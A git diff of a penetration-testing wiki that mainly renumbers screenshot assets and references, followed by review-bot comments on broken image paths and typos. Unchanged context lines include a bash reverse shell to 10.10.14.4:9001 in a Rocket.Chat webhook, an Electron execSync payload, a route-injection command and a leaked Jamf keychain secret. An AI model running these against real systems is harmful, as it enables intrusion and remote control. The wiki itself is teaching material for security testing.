diff --git a/.gitbook/assets/image (11).png b/.gitbook/assets/image (11).png index 218780f03..3ae281225 100644 Binary files a/.gitbook/assets/image (11).png and b/.gitbook/assets/image (11).png differ diff --git a/.gitbook/assets/image (13).png b/.gitbook/assets/image (13).png index 248451f19..c78341920 100644 Binary files a/.gitbook/assets/image (13).png and b/.gitbook/assets/image (13).png differ diff --git a/.gitbook/assets/image (14).png b/.gitbook/assets/image (14).png index 4ede9266b..a254c23a8 100644 Binary files a/.gitbook/assets/image (14).png and b/.gitbook/assets/image (14).png differ diff --git a/.gitbook/assets/image (15).png b/.gitbook/assets/image (15).png deleted file mode 100644 index 0ef3cc20b..000000000 Binary files a/.gitbook/assets/image (15).png and /dev/null differ diff --git a/.gitbook/assets/image (16).png b/.gitbook/assets/image (16).png index 20ead5c09..e8b6b2135 100644 Binary files a/.gitbook/assets/image (16).png and b/.gitbook/assets/image (16).png differ diff --git a/.gitbook/assets/image (17) (3).png b/.gitbook/assets/image (17) (3).png index 9b6db2a3a..feabde2df 100644 Binary files a/.gitbook/assets/image (17) (3).png and b/.gitbook/assets/image (17) (3).png differ diff --git a/.gitbook/assets/image (17).png b/.gitbook/assets/image (17).png index 77f2a8962..9b6db2a3a 100644 Binary files a/.gitbook/assets/image (17).png and b/.gitbook/assets/image (17).png differ diff --git a/.gitbook/assets/image (18).png b/.gitbook/assets/image (18).png index 3ae281225..c0008cb7b 100644 Binary files a/.gitbook/assets/image (18).png and b/.gitbook/assets/image (18).png differ diff --git a/.gitbook/assets/image (19) (1).png b/.gitbook/assets/image (19) (1).png index 3305c8600..ab835abd2 100644 Binary files a/.gitbook/assets/image (19) (1).png and b/.gitbook/assets/image (19) (1).png differ 
diff --git a/.gitbook/assets/image (19).png b/.gitbook/assets/image (19).png index c78341920..3305c8600 100644 Binary files a/.gitbook/assets/image (19).png and b/.gitbook/assets/image (19).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (2) (1).png b/.gitbook/assets/image (2) (1) (1) (2) (1).png new file mode 100644 index 000000000..c3ffd5532 Binary files /dev/null and b/.gitbook/assets/image (2) (1) (1) (2) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (2).png b/.gitbook/assets/image (2) (1) (1) (2).png index c3ffd5532..163b502de 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (2).png and b/.gitbook/assets/image (2) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (2) (1) (1).png b/.gitbook/assets/image (2) (1) (1).png index 163b502de..eb7611c98 100644 Binary files a/.gitbook/assets/image (2) (1) (1).png and b/.gitbook/assets/image (2) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png index eb7611c98..4bb5f2707 100644 Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png index 4bb5f2707..ed57bd5ff 100644 Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ diff --git a/.gitbook/assets/image (20) (1).png b/.gitbook/assets/image (20) (1).png index e5d569d4c..fc66de854 100644 Binary files a/.gitbook/assets/image (20) (1).png and b/.gitbook/assets/image (20) (1).png differ diff --git a/.gitbook/assets/image (20).png b/.gitbook/assets/image (20).png index a254c23a8..e5d569d4c 100644 Binary files a/.gitbook/assets/image (20).png and b/.gitbook/assets/image (20).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1).png index 455fbb8b7..eb57ea914 100644 Binary files a/.gitbook/assets/image (3) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1).png differ 
diff --git a/.gitbook/assets/image (3) (1) (1).png b/.gitbook/assets/image (3) (1) (1).png index eb57ea914..6874f9c86 100644 Binary files a/.gitbook/assets/image (3) (1) (1).png and b/.gitbook/assets/image (3) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png index 6874f9c86..38b71f3d4 100644 Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png index 38b71f3d4..218780f03 100644 Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1).png new file mode 100644 index 000000000..2fde683ec Binary files /dev/null and b/.gitbook/assets/image (4) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1).png index 2fde683ec..6c4e73dca 100644 Binary files a/.gitbook/assets/image (4) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1).png b/.gitbook/assets/image (4) (1) (1).png index 6c4e73dca..0d4cd8ba0 100644 Binary files a/.gitbook/assets/image (4) (1) (1).png and b/.gitbook/assets/image (4) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png index 0d4cd8ba0..743e51c38 100644 Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png index 743e51c38..248451f19 100644 Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ diff --git a/.gitbook/assets/image (5) (1) (1) (2) (1).png b/.gitbook/assets/image (5) (1) (1) (2) (1).png new file mode 100644 index 000000000..5dc69a4e7 Binary files /dev/null and b/.gitbook/assets/image (5) (1) (1) (2) (1).png differ 
diff --git a/.gitbook/assets/image (5) (1) (1) (2).png b/.gitbook/assets/image (5) (1) (1) (2).png index 5dc69a4e7..114d35653 100644 Binary files a/.gitbook/assets/image (5) (1) (1) (2).png and b/.gitbook/assets/image (5) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (5) (1) (1).png b/.gitbook/assets/image (5) (1) (1).png index 114d35653..4642e6584 100644 Binary files a/.gitbook/assets/image (5) (1) (1).png and b/.gitbook/assets/image (5) (1) (1).png differ diff --git a/.gitbook/assets/image (5) (1).png b/.gitbook/assets/image (5) (1).png index 4642e6584..4fbfba8c7 100644 Binary files a/.gitbook/assets/image (5) (1).png and b/.gitbook/assets/image (5) (1).png differ diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png index 4fbfba8c7..4ede9266b 100644 Binary files a/.gitbook/assets/image (5).png and b/.gitbook/assets/image (5).png differ diff --git a/.gitbook/assets/image (6) (2) (1).png b/.gitbook/assets/image (6) (2) (1).png new file mode 100644 index 000000000..5e0361188 Binary files /dev/null and b/.gitbook/assets/image (6) (2) (1).png differ diff --git a/.gitbook/assets/image (6) (2).png b/.gitbook/assets/image (6) (2).png index 5e0361188..345e6bee9 100644 Binary files a/.gitbook/assets/image (6) (2).png and b/.gitbook/assets/image (6) (2).png differ diff --git a/.gitbook/assets/image (6).png b/.gitbook/assets/image (6).png index 345e6bee9..0ef3cc20b 100644 Binary files a/.gitbook/assets/image (6).png and b/.gitbook/assets/image (6).png differ diff --git a/.gitbook/assets/image (7) (1) (3).png b/.gitbook/assets/image (7) (1) (3).png new file mode 100644 index 000000000..9a68acef6 Binary files /dev/null and b/.gitbook/assets/image (7) (1) (3).png differ diff --git a/.gitbook/assets/image (7) (1).png b/.gitbook/assets/image (7) (1).png index 9a68acef6..d990711a1 100644 Binary files a/.gitbook/assets/image (7) (1).png and b/.gitbook/assets/image (7) (1).png differ 
diff --git a/.gitbook/assets/image (7).png b/.gitbook/assets/image (7).png index d990711a1..20ead5c09 100644 Binary files a/.gitbook/assets/image (7).png and b/.gitbook/assets/image (7).png differ diff --git a/.gitbook/assets/image (8).png b/.gitbook/assets/image (8).png index ed57bd5ff..77f2a8962 100644 Binary files a/.gitbook/assets/image (8).png and b/.gitbook/assets/image (8).png differ diff --git a/backdoors/salseo.md b/backdoors/salseo.md index d98dbce9c..21f0bc44f 100644 --- a/backdoors/salseo.md +++ b/backdoors/salseo.md @@ -105,11 +105,11 @@ Open the SalseoLoader project using Visual Studio. #### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...** -![](<../.gitbook/assets/image (3) (1) (1) (1).png>) +![](<../.gitbook/assets/image (3) (1) (1) (1) (1).png>) #### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)** -![](<../.gitbook/assets/image (4) (1) (1) (1).png>) +![](<../.gitbook/assets/image (4) (1) (1) (1) (1).png>) In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat** @@ -117,7 +117,7 @@ In your project folder have appeared the files: **DllExport.bat** and **DllExpor Press **Uninstall** (yeah, its weird but trust me, it is necessary) -![](<../.gitbook/assets/image (5) (1) (1) (2).png>) +![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>) ### **Exit Visual Studio and execute DllExport\_configure** diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index c6aede60f..fdcfd6a9b 100644 --- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -137,7 +137,7 @@ Arguments of the script: ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 ``` -
+
**Our host seems to be in trouble :)** diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md index 36887f554..3f5fc29af 100644 --- a/macos-hardening/macos-red-teaming/README.md +++ b/macos-hardening/macos-red-teaming/README.md @@ -49,11 +49,11 @@ You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/J Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form: -![](<../../.gitbook/assets/image (19).png>) +![](<../../.gitbook/assets/image (13).png>) #### JAMF device Authentication -
+
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\ Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`** @@ -100,7 +100,7 @@ With this information, **create a VM** with the **stolen** Hardware **UUID** and #### Secrets stealing -

a

+

a

You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**. @@ -203,7 +203,7 @@ MacOS Red Teaming is different from a regular Windows Red Teaming as usually **M When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed: -
+
## References diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md index f8bd4db19..d12d0a87c 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md @@ -23,7 +23,7 @@ This function will make the **allowed binary own the PID** but the **malicious X If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\ Like for example in this image (taken from the reference): -
+
Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit: diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md index 6796980af..02009b0be 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md @@ -22,7 +22,7 @@ Obviously, this is so powerful, it's complicated to load a kernel extension. The * Going into **recovery mode** Kexts need to be **allowed to be loaded**: -
+
* The Kext must be **signed with a kernel code signing certificate**, which can only be granted by **Apple**. Who will be **reviewing** in detail the **company** and the **reasons** why this is needed. * The Kext also needs to be **notarized**, Apple will be able to check it for malware. diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md index c63f3ab5e..23d5baf48 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md @@ -16,7 +16,7 @@ Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction. -
+
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions. @@ -56,7 +56,7 @@ The events that the Endpoint Security framework can monitor are categorized into ### Endpoint Security Framework Architecture -
+
**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller: diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md index 8ba505314..9e8cd3962 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md @@ -76,7 +76,7 @@ fat_magic FAT_MAGIC or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool: -
+
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch. @@ -199,11 +199,11 @@ struct section_64 { /* for 64-bit architectures */ Example of **section header**: -
+
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC` -
+
It's also possible to get **headers information** from the **command line** with: diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md index 0ad7001c4..8de71d0c0 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md @@ -32,7 +32,7 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/ {% endcode %} {% hint style="danger" %} -Note that now **hardened** Electron applications will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set. +Note that now **hardened** Electron applications with **RunAsNode** disabled will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set. However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes. {% endhint %} diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md index 1dad22560..5ec636d80 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md @@ -14,7 +14,7 @@ ## Sandbox loading process -

Image from http://newosxbook.com/files/HITSB.pdf

+

Image from http://newosxbook.com/files/HITSB.pdf

In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md index 6aa9757b4..3a92811ea 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md @@ -143,7 +143,7 @@ $> ls ~/Documents Notes had access to TCC protected locations but when a note is created this is **created in a non-protected location**. So, you could ask notes to copy a protected file in a noe (so in a non-protected location) and then access the file: -
+
### CVE-2021-XXXX - Translocation @@ -387,7 +387,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple). -
+
## Reference diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md index a67a09b63..15e1f2d1a 100644 --- a/network-services-pentesting/pentesting-postgresql.md +++ b/network-services-pentesting/pentesting-postgresql.md @@ -479,7 +479,7 @@ In[ this **writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP: -
+
Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner. diff --git a/network-services-pentesting/pentesting-web/put-method-webdav.md b/network-services-pentesting/pentesting-web/put-method-webdav.md index 1a169ddc9..656d66b99 100644 --- a/network-services-pentesting/pentesting-web/put-method-webdav.md +++ b/network-services-pentesting/pentesting-web/put-method-webdav.md @@ -42,7 +42,7 @@ davtest [-auth user:password] -sendbd auto -url http:// #Try to upload every Output sample: -![](<../../.gitbook/assets/image (19) (1) (1).png>) +![](<../../.gitbook/assets/image (19) (1).png>) This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web. diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md index 64584b99d..4aa91eb71 100644 --- a/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/network-services-pentesting/pentesting-web/rocket-chat.md @@ -35,12 +35,12 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'") * Configure WebHook script: -
+
* Save changes * Get the generated WebHook URL: -
+
* Call it with curl and you shuold receive the rev shell diff --git a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md index 759ce057a..0ef0b9a48 100644 --- a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md +++ b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md @@ -206,7 +206,7 @@ The following will add a `Location` header to the response ``` -
+
#### CRLF in Add header (**CVE-2019-2438)** diff --git a/pentesting-web/xss-cross-site-scripting/dom-invader.md b/pentesting-web/xss-cross-site-scripting/dom-invader.md index 4d219b62c..62d377de1 100644 --- a/pentesting-web/xss-cross-site-scripting/dom-invader.md +++ b/pentesting-web/xss-cross-site-scripting/dom-invader.md @@ -27,11 +27,11 @@ DOM Invader integrates a tab within the browser's DevTools panel enabling the fo In the Burp's builtin browser go to the **Burp extension** and enable it: -
+
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:** -
+
### Inject a Canary @@ -69,7 +69,7 @@ You can click each message to view more detailed information about it, including DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it: -
+
Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**. diff --git a/todo/radio-hacking/flipper-zero/fz-ibutton.md b/todo/radio-hacking/flipper-zero/fz-ibutton.md index f004a9314..50831ea8c 100644 --- a/todo/radio-hacking/flipper-zero/fz-ibutton.md +++ b/todo/radio-hacking/flipper-zero/fz-ibutton.md @@ -24,7 +24,7 @@ For more info about what is an iButton check: The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**. -
+
## Actions diff --git a/todo/radio-hacking/ibutton.md b/todo/radio-hacking/ibutton.md index 43169dffa..777c83633 100644 --- a/todo/radio-hacking/ibutton.md +++ b/todo/radio-hacking/ibutton.md @@ -16,7 +16,7 @@ iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside. -
+
### What is iButton? diff --git a/todo/radio-hacking/infrared.md b/todo/radio-hacking/infrared.md index 9ccdb0822..1a415aad0 100644 --- a/todo/radio-hacking/infrared.md +++ b/todo/radio-hacking/infrared.md @@ -32,7 +32,7 @@ IR protocols differ in 3 factors: Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant. -
+
**2. Pulse Width Encoding** diff --git a/windows-hardening/active-directory-methodology/ad-certificates.md b/windows-hardening/active-directory-methodology/ad-certificates.md index 730a7f971..64d990a34 100644 --- a/windows-hardening/active-directory-methodology/ad-certificates.md +++ b/windows-hardening/active-directory-methodology/ad-certificates.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). 
@@ -113,7 +113,7 @@ The **security descriptor** configured on the **Enterprise CA** defines these ri This ultimately ends up setting the Security registry value in the key **`HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration`** on the CA server. We have encountered several AD CS servers that grant low-privileged users remote access to this key via remote registry: -
+
Low-privileged users can also **enumerate this via DCOM** using the `ICertAdminD2` COM interface’s `GetCASecurity` method. However, normal Windows clients need to install the Remote Server Administration Tools (RSAT) to use it since the COM interface and any COM objects that implement it are not present on Windows by default. @@ -226,7 +226,7 @@ certutil -v -dstemplate #enumerate certificate templates * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). 
diff --git a/windows-hardening/av-bypass.md b/windows-hardening/av-bypass.md index fae40774e..aa765ddf4 100644 --- a/windows-hardening/av-bypass.md +++ b/windows-hardening/av-bypass.md @@ -54,7 +54,7 @@ It turns out that Microsoft Defender's Sandbox computername is HAL9TH, so, you c Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes -

Red Team VX Discord #malware-dev channel

+

Red Team VX Discord #malware-dev channel

As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something: @@ -303,7 +303,7 @@ Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) alr It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**. -
+
* **Inline** diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md index 3e6568daa..e97e14a64 100644 --- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md +++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md @@ -57,7 +57,7 @@ if ($envPath -notlike "*$folderPath*") { * **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**. * Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder: -
+
### Missed Dlls
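
Review bot: In the salseo.md hunk at `@@ -105`, the first `+` line now points at `image (3) (1) (1) (1) (1).png`, but no such file is created or modified anywhere in this patch; the asset list only rewrites `image (3) (1) (1) (1).png` (455fbb8b7 → eb57ea914) and never creates a `(1) (1) (1) (1)` variant carrying the old blob 455fbb8b7. The other two new references in the same file are consistent (`image (4) (1) (1) (1) (1).png` is added with blob 2fde683ec, the previous content of `image (4) (1) (1) (1).png`, and `image (5) (1) (1) (2) (1).png` is added with 5dc69a4e7, the previous content of `image (5) (1) (1) (2).png`), so the NuGet Package Manager screenshot is the one that will render as a broken image unless that path already exists in the repository. Please verify before merging.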
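
Review bot: The macos-red-teaming hunk at `@@ -49` looks like a no-op content-wise and that should be stated in the commit message: the new target `image (13).png` is rewritten in this patch to blob c78341920, which is exactly the previous blob of the dropped target `image (19).png` (c78341920 → 3305c8600), so the brute-force form screenshot is unchanged and only GitBook's asset numbering shifted. A one-line "asset renumbering by GitBook, no screenshot changes" in the message would save the next reader from diffing binary blobs to reach the same conclusion.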
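
Review bot: The electron-applications-injection hint at `@@ -32` is internally inconsistent after the rewording: it says applications with RunAsNode disabled ignore node parameters "unless the env variable `ELECTRON_RUN_AS_NODE` is set", but RunAsNode is the fuse that decides whether `ELECTRON_RUN_AS_NODE` is honoured at all, so with it disabled the variable cannot re-enable anything. Suggest either dropping the "unless" clause or splitting the sentence into the two cases (CLI arguments such as `--inspect` on one side, the `ELECTRON_RUN_AS_NODE` variable on the other) so the reader knows which setting governs which behaviour; the following sentence about `--remote-debugging-port=9229` still working is fine as written.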
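
Review bot: In the macos-tcc-bypasses hunk at `@@ -143`, the unchanged context line reads "copy a protected file in a noe"; since this hunk is being touched anyway, please fix "noe" to "note" rather than leaving the typo next to the updated figure.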
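
Review bot: The put-method-webdav hunk at `@@ -42` drops the reference to `image (19) (1) (1).png`, but that file is not deleted in this patch and nothing else references it in the visible changes; if it is now orphaned, remove it in the same change so the assets folder does not keep accumulating dead screenshots.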
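
Review bot: In the rocket-chat hunk at `@@ -35`, the trailing context line "Call it with curl and you shuold receive the rev shell" has a typo; please correct "shuold" to "should" while this hunk is open.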
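
Review bot: In the dom-invader hunk at `@@ -27`, the context line "Noe refresh the page" should read "Now refresh the page"; worth fixing alongside the figure update.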
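
Review bot: In the fz-ibutton hunk at `@@ -24`, the context sentence "The **blue** part of the following imageis how you would need to..." is missing a space ("imageis" → "image is"); please fix it here since the figure directly below is what this hunk changes.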
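
Review bot: The two ad-certificates hunks at `@@ -7` and `@@ -226` change nothing but a backslash before the underscore in the `https://twitter.com/hacktricks_live` link target. CommonMark resolves `\_` inside a link destination to a plain `_`, so rendering is identical; the edit is a GitBook serializer artifact that will keep flip-flopping between editors and buries the real content changes in this patch. Consider settling on one form for the shared header/footer block repo-wide (ideally the unescaped URL) instead of letting each commit re-escape it.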